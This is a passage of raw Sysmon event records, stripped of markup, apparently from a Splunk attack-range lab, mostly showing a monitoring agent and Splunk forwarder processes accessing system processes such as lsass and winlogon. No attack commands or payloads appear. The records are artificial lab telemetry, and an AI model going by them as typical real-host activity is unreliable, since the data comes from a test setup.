Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9FF-63C7-1C00-00000000AF02}2208C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000039973Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:31.834{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F6-63C7-1A00-00000000AF02}1436C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000039972Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:31.833{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1700-00000000AF02}1412C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000039971Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:31.809{FE4C2B44-E35B-63C7-0406-00000000AF02}70762296C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039970Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:31.807{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000039969Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:31.803{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000039968Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:31.798{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1400-00000000AF02}1060C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000039967Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:31.786{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000039966Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:31.779{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000039965Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:31.773{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1100-00000000AF02}492C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000039964Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:31.765{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000039963Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:31.756{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0F00-00000000AF02}304C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000039962Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:31.750{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0E00-00000000AF02}1004C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000039961Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:31.741{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000039960Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:31.729{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000039959Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:31.690{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000039958Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:31.687{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0900-00000000AF02}564C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000039957Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:31.625{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E35B-63C7-0406-00000000AF02}7076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039956Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:31.625{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039955Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:31.625{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039954Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:31.625{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039953Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:31.625{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039952Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:31.625{FE4C2B44-D9F3-63C7-0500-00000000AF02}408524C:\Windows\system32\csrss.exe{FE4C2B44-E35B-63C7-0406-00000000AF02}7076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000039951Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:31.625{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E35B-63C7-0406-00000000AF02}7076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000039950Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:31.625{FE4C2B44-E35B-63C7-0406-00000000AF02}7076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000039949Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:31.547{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9A73D6FA8DDFA99E2919917430A96F9,SHA256=57A73DF27D8D79D6FF57938B161052F408ABCA61A923BE449DD97D4FE0F88F2A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015245Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:31.198{E5A8D418-DCC0-63C7-9F00-00000000B002}3096NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=BB0F48746B23524003E92E2B0C5003F4,SHA256=C83CCB2A6805449D175D14B0E2C9B8BAD5C0CEE2348C60BC2E286E20F9BB3D59,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000015279Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:30.953{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50043-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000015278Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:32.836{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05EFA09EDC8E4FDC1C0F1D87DCC8DE75,SHA256=BA9E1693E0BCC70C7EC68040F4EB21209D0012265C3C72088E80862EC0D06595,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000039994Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:32.752{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C16972A01117324DF7C343D0864D25F4,SHA256=A49312494FE81AC68C9B22440F715E8A8E0D078982FAD71D7E7AC1C30CBA6B4A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000039993Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:32.603{FE4C2B44-E35C-63C7-0506-00000000AF02}55641884C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015277Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:32.557{E5A8D418-E35C-63C7-E401-00000000B002}37403048C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015276Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:32.530{E5A8D418-DC44-63C7-1C00-00000000B002}20203028C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-E35C-63C7-E401-00000000B002}3740C:\Program 